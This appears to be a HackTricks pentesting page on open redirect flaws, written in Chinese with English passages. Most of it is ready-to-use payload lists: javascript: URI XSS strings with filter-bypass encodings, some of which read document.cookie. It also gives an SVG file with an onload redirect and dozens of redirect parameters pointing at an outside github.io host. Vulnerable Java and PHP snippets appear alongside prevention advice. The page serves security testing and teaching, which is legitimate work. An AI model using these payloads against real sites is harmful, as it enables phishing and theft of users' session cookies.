10 KiB
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
其他支持HackTricks的方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
开放重定向
重定向到本地主机或任意域
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}
开放重定向到XSS
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)
#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
开放重定向上传 svg 文件
When a web application allows users to upload files, it can be vulnerable to an open redirect attack if the application does not properly validate the uploaded file's content. This can be exploited by uploading an SVG file containing malicious code that, when accessed by a victim, redirects them to a malicious website.
当一个 web 应用程序允许用户上传文件时,如果应用程序没有正确验证上传文件的内容,它可能会容易受到开放重定向攻击的影响。攻击者可以通过上传一个包含恶意代码的 SVG 文件来利用这一漏洞,当受害者访问该文件时,会被重定向到一个恶意网站。
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
常见的注入参数
An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. This can be exploited by an attacker to redirect users to malicious websites to perform phishing attacks or distribute malware. To identify open redirect vulnerabilities, testers can look for the following common injection parameters:
- url: Used to specify the target URL for redirection.
- link: Used to specify the link to redirect to.
- next: Used to specify the next page to redirect to after a successful action.
- target: Used to specify the target page for redirection.
- rurl: Used to specify the URL to redirect to.
- dest: Used to specify the destination URL for redirection.
By testing these parameters for open redirect vulnerabilities, testers can help improve the security of web applications and protect users from potential attacks.
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
代码示例
.Net
response.redirect("~/mysafe-subdomain/login.aspx")
Java
Open Redirect
An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.
Example
Consider the following vulnerable Java code snippet:
String redirectUrl = request.getParameter("redirect");
response.sendRedirect(redirectUrl);
In this example, the redirect parameter is directly used in the sendRedirect method without any validation. An attacker can craft a malicious link like http://vulnerable-website.com/?redirect=http://malicious-website.com to redirect users to the malicious website.
Prevention
To prevent open redirect vulnerabilities in Java applications, always validate and sanitize user input before using it in redirect functions. Whitelist allowed domains or URLs and ensure that the redirect URL belongs to the expected domain.
response.redirect("http://mysafedomain.com");
PHP
Open Redirect Vulnerability
An open redirect vulnerability exists when a web application allows users to redirect to external URLs. Attackers can exploit this vulnerability to trick users into visiting malicious websites.
Example
Consider the following PHP code snippet:
<?php
$url = $_GET['url'];
header("Location: " . $url);
?>
In this code, the application redirects users to the URL specified in the url parameter of the GET request. An attacker can craft a malicious URL like http://example.com/redirect.php?url=http://malicious-site.com to redirect users to a malicious website.
Prevention
To prevent open redirect vulnerabilities, always validate and sanitize user input before using it to redirect users. Whitelist allowed URLs or domains to ensure that only trusted destinations can be redirected to.
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
工具
资源
- 在 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect 中,您可以找到模糊列表。\
- https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\
- https://github.com/cujanovic/Open-Redirect-Payloads
- https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a
从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs收藏品
- 加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦 @carlospolopm.
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。